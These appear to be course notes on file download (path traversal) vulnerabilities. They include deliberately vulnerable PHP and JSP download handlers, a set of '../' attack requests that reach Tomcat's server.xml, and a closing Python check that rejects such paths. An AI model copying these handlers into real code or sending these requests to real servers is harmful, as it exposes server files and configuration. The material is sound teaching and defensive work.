File Upload Vulnerability
What is a file download vulnerability?
An attack that uses a file download function to download files other than the ones it legitimately serves.
Legitimate file vs. illegitimate file
The difference is in the [path].
Instead of downloading from the legitimate path, the attacker escapes the designated path, moves to a parent directory, and views or downloads the server's documents, code, configuration and other files.
C:\Users\kitri\Downloads
From this current path, we want to reach the Users directory on the C drive:
cd ../../
cd C:\Users
Ways to move between paths when exploiting a file download vulnerability
1. Insert path-traversal characters (../)
2. Use path characters (an absolute path)
htdocs (home directory)
- CSS
- JS
- Upload
- Download
File download function
download.jsp
downloadAction.jsp
downAction.jsp
sadfsdafl.co.kr/download.jsp?file=<filename>
The filename is a user-supplied input value.
Most vulnerabilities begin where user input is accepted.
Why? To provide dynamic services, a site has no choice but to accept input values.
A web site has one or more download functions, and
when it receives user input, it hands the user the specified file from the specified path.
File download function: required prerequisites
A web directory must exist, and there must be a page that performs the file download.
Depending on the file types the web browser can handle, URL access may be restricted.
If a site allows file upload -> where an upload folder exists, it is worth looking for a file download function.
Linux is somewhat more exposed to file download vulnerabilities.
On Windows the partitions are all separate, so it is not possible to switch to another drive.
File download logic
Reading the password.txt file in the download_vuln folder on the C drive
- Direct method
www.kitri.re.kr/kitri/file/download.web?dir=/uploadfile/&filename=kitri_logo_Ko_En.jpg&siteDib=kitri
- Indirect method
The file is downloaded by way of a database lookup
www.kitri.re.kr/dowload.web?idx=1
# index.php
<?php
header("Content-Type: text/html; charset=UTF-8");
?>
<li>첨부파일 : <a href="./download.php?filename=test.jpg">[다운로드]</a></li>
# download.php
<?php
// Deliberately vulnerable: $filename is used as-is, so "../" sequences reach outside upload/
$filename = $_GET["filename"];
$filepath = "upload/{$filename}";
header("Content-Type: application/octet-stream");
header("Content-Disposition: attachment; filename={$filename}");
readfile($filepath);
?>
Original Filename & Real Filename
<%@ page contentType="text/html; charset=UTF-8" %>
<li>다운로드1 : <a href="download1.jsp?org_filename=test.jpg&real_filename=abcd.jpg">[다운로드1]</a></li>
<li>다운로드2 : <a href="download2.jsp?path=image&org_filename=test.jpg&real_filename=abcd.jpg">[다운로드2]</a></li>
<li>다운로드3 : <a href="download3.jsp?path=C:/apache-tomcat-8.5.81/webapps/ROOT/upload/image/&org_filename=test.jpg&real_filename=abcd.jpg">[다운로드3]</a></li>
# download.php (original filename vs. real filename)
<?php
// Deliberately vulnerable: the path is built from org_filename with no traversal check
$org_filename = $_GET["org_filename"];
$real_filename = $_GET["real_filename"];
$filepath = "upload/{$org_filename}";
header("Content-Type: application/octet-stream");
header("Content-Disposition: attachment; filename={$real_filename}");
readfile($filepath);
?>
# jsp original filename, real filename
# original filename = the file name the downloaded file is given
# real filename = the actual original file name
<%@ page contentType="text/html; charset=UTF-8" %>
<li>다운로드1 : <a href="download1.jsp?org_filename=test.jpg&real_filename=abcd.jpg">[다운로드1]</a></li>
<li>다운로드2 : <a href="download2.jsp?path=image&org_filename=test.jpg&real_filename=abcd.jpg">[다운로드2]</a></li>
<li>다운로드3 : <a href="download3.jsp?path=C:\apache-tomcat-8.5.81\webapps\ROOT\upload\image&org_filename=test.jpg&real_filename=abcd.jpg">[다운로드3]</a></li>
# using an original filename and a real filename
# download1.jsp
<%@ page contentType="text/html; charset=UTF-8" %>
<%@ page import="java.util.*, java.io.*"%>
<%
FileInputStream fis = null; // read the file as bytes (input) and copy them out (output)
BufferedInputStream bis = null; // read the file through a buffer
BufferedOutputStream bos = null; // write to the response through a buffer
String path ="C:\\apache-tomcat-8.5.81\\webapps\\ROOT\\upload\\image\\";
String org_filename = request.getParameter("org_filename");
String real_filename = request.getParameter("real_filename");
if(org_filename == null || real_filename == null){
// alert text: "파일명이 입력되지 않았습니다." = the file name was not supplied
out.println("<script>alert('파일명이 입력되지 않았습니다.');history.back(-1);</script>");
return;
}
try{
File fd = new File(path + real_filename); // deliberately vulnerable: path + real_filename with no traversal check
if(!fd.exists()){
// alert text: "파일이 존재하지 않습니다." = the file does not exist
out.println("<script>alert('파일이 존재하지 않습니다.');history.back(-1);</script>");
return; // without this return, new FileInputStream(fd) below throws FileNotFoundException
}
response.setHeader("Content-Type", "application/octet-stream");
response.setHeader("Content-Disposition", "attachment; filename=" + org_filename);
fis = new FileInputStream(fd);
bis = new BufferedInputStream(fis);
bos = new BufferedOutputStream(response.getOutputStream());
byte[] buffer = new byte[1024];
int i = 0;
while((i=(bis.read(buffer))) != -1){ // repeat until the input is exhausted (read() returns -1)
bos.write(buffer,0,i);
}
bos.flush();
}finally{
if(fis != null) fis.close();
if(bis != null) bis.close();
if(bos != null) bos.close();
}
%>
# only part of the file path is exposed
# download2.jsp
<%@ page contentType="text/html; charset=UTF-8" %>
<%@ page import="java.util.*, java.io.*"%>
<%
FileInputStream fis = null;
BufferedInputStream bis = null;
BufferedOutputStream bos = null;
String path_temp = request.getParameter("path");
String org_filename = request.getParameter("org_filename");
String real_filename = request.getParameter("real_filename");
String path ="C:\\apache-tomcat-8.5.81\\webapps\\ROOT\\upload\\" + path_temp + "\\";
if(org_filename == null || real_filename == null){
// alert text: "파일명이 입력되지 않았습니다." = the file name was not supplied
out.println("<script>alert('파일명이 입력되지 않았습니다.');history.back(-1);</script>");
return;
}
try{
File fd = new File(path + real_filename); // deliberately vulnerable: both path_temp and real_filename are user-controlled
if(!fd.exists()){
// alert text: "파일이 존재하지 않습니다." = the file does not exist
out.println("<script>alert('파일이 존재하지 않습니다.');history.back(-1);</script>");
return; // without this return, new FileInputStream(fd) below throws FileNotFoundException
}
response.setHeader("Content-Type", "application/octet-stream");
response.setHeader("Content-Disposition", "attachment; filename=" + org_filename);
fis = new FileInputStream(fd);
bis = new BufferedInputStream(fis);
bos = new BufferedOutputStream(response.getOutputStream());
byte[] buffer = new byte[1024];
int i = 0;
while((i=(bis.read(buffer))) != -1){
bos.write(buffer,0,i);
}
bos.flush();
}finally{
if(fis != null) fis.close();
if(bis != null) bis.close();
if(bos != null) bos.close();
}
%>
# the entire file path is exposed
# download3.jsp
<%@ page contentType="text/html; charset=UTF-8" %>
<%@ page import="java.util.*, java.io.*"%>
<%
FileInputStream fis = null;
BufferedInputStream bis = null;
BufferedOutputStream bos = null;
String path = request.getParameter("path");
String org_filename = request.getParameter("org_filename");
String real_filename = request.getParameter("real_filename");
if(org_filename == null || real_filename == null){
// alert text: "파일명이 입력되지 않았습니다." = the file name was not supplied
out.println("<script>alert('파일명이 입력되지 않았습니다.');history.back(-1);</script>");
return;
}
try{
File fd = new File(path + real_filename); // deliberately vulnerable: the whole path comes straight from the request
if(!fd.exists()){
// alert text: "파일이 존재하지 않습니다." = the file does not exist
out.println("<script>alert('파일이 존재하지 않습니다.');history.back(-1);</script>");
return; // without this return, new FileInputStream(fd) below throws FileNotFoundException
}
response.setHeader("Content-Type", "application/octet-stream");
response.setHeader("Content-Disposition", "attachment; filename=" + org_filename);
fis = new FileInputStream(fd);
bis = new BufferedInputStream(fis);
bos = new BufferedOutputStream(response.getOutputStream());
byte[] buffer = new byte[1024];
int i = 0;
while((i=(bis.read(buffer))) != -1){
bos.write(buffer,0,i);
}
bos.flush();
}finally{
if(fis != null) fis.close();
if(bis != null) bis.close();
if(bos != null) bos.close();
}
%>
Original Filename : the file name as I see it when I download or upload the file
Real Filename : the file name as stored on the web server
Attack methods
CASE 1: only the filename is taken from user input
Normal request : /download1.jsp?filename=abcd.jpg
Attack request : /download1.jsp?filename=../../../../conf/server.xml
CASE 2: a partial path plus the filename are taken from user input
Normal request : /download2.jsp?path=image&filename=abcd.jpg
Attack request 1 : /download2.jsp?path=../../../conf&filename=server.xml
Attack request 2 : /download2.jsp?path=../../../conf/server.xml&filename=
Attack request 3 : /download2.jsp?path=image&filename=../../../../conf/server.xml
CASE 3: an absolute path is taken from user input
Normal request : /download3.jsp?path=C:/apache-tomcat-8.5.81/webapps/ROOT/upload/image/&org_filename=test.jpg&real_filename=abcd.jpg
Attack request 1 : /download3.jsp?path=C:/apache-tomcat-8.5.81/conf/&org_filename=test.xml&real_filename=server.xml
Linux
cd /etc/networks (o)
cd \etc\networks (x)  <- a backslash is not a path separator on Linux
Windows
cd C:\windows\system32 (o)
cd C:/windows/system32 (o)  <- Windows accepts both separators
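As an added example that is not part of the original post, this is the check a hardened version of download1/2/3.jsp needs before it ever calls exists() or opens the file: build the path, normalise it, and refuse anything that resolves outside the upload base. It reuses the base directory hard-coded in download1.jsp and feeds it the CASE 1-3 requests from above; ntpath models the Windows server on this page (both separators), posixpath the Linux rule just noted, so nothing touches a real filesystem.

```python
# Added example, not code from the original page. Resolve a download request
# the way download1/2/3.jsp should: join, normalise, and reject anything that
# leaves the upload base BEFORE exists()/open() is called. ntpath models the
# page's Windows server ('/' and '\' both separate); posixpath models Linux,
# where only '/' separates. Purely lexical, so no filesystem is needed.
import ntpath
import posixpath

# Base directory hard-coded in download1.jsp above.
UPLOAD_BASE = r"C:\apache-tomcat-8.5.81\webapps\ROOT\upload"


def resolve_download(base_dir, path, real_filename, flavour=ntpath):
    """Return the normalised target path, or None if it escapes base_dir.
    `path` and `real_filename` are the user-controlled request parameters.
    """
    base = flavour.normpath(base_dir)
    # CASE 3 shape: an absolute `path` makes join() discard the base entirely.
    if flavour.isabs(path) or flavour.isabs(real_filename):
        return None
    target = flavour.normpath(flavour.join(base, path, real_filename))
    try:
        # commonpath rather than startswith(): a prefix test would accept
        # a sibling such as <base>_evil as if it were inside the base.
        inside = flavour.commonpath([base, target]) == base
    except ValueError:  # ntpath raises when the drive letters differ
        inside = False
    # target == base means no file name survived normalisation.
    return target if inside and target != base else None


def main():
    # Constructed from the CASE 1-3 requests listed on the page.
    requests = [
        ("image", "abcd.jpg"),                            # normal request
        ("image", "../../../../conf/server.xml"),         # CASE 1 / CASE 2 #3
        ("../../../conf", "server.xml"),                  # CASE 2 #1
        ("../../../conf/server.xml", ""),                 # CASE 2 #2
        ("C:/apache-tomcat-8.5.81/conf/", "server.xml"),  # CASE 3
    ]
    for path, name in requests:
        verdict = resolve_download(UPLOAD_BASE, path, name)
        print(f"path={path!r:<36} file={name!r:<31} -> {verdict or 'REJECTED'}")


if __name__ == "__main__":
    main()
```

Only the first request resolves to a path under UPLOAD_BASE; every traversal shape from the three cases is rejected before any file I/O happens.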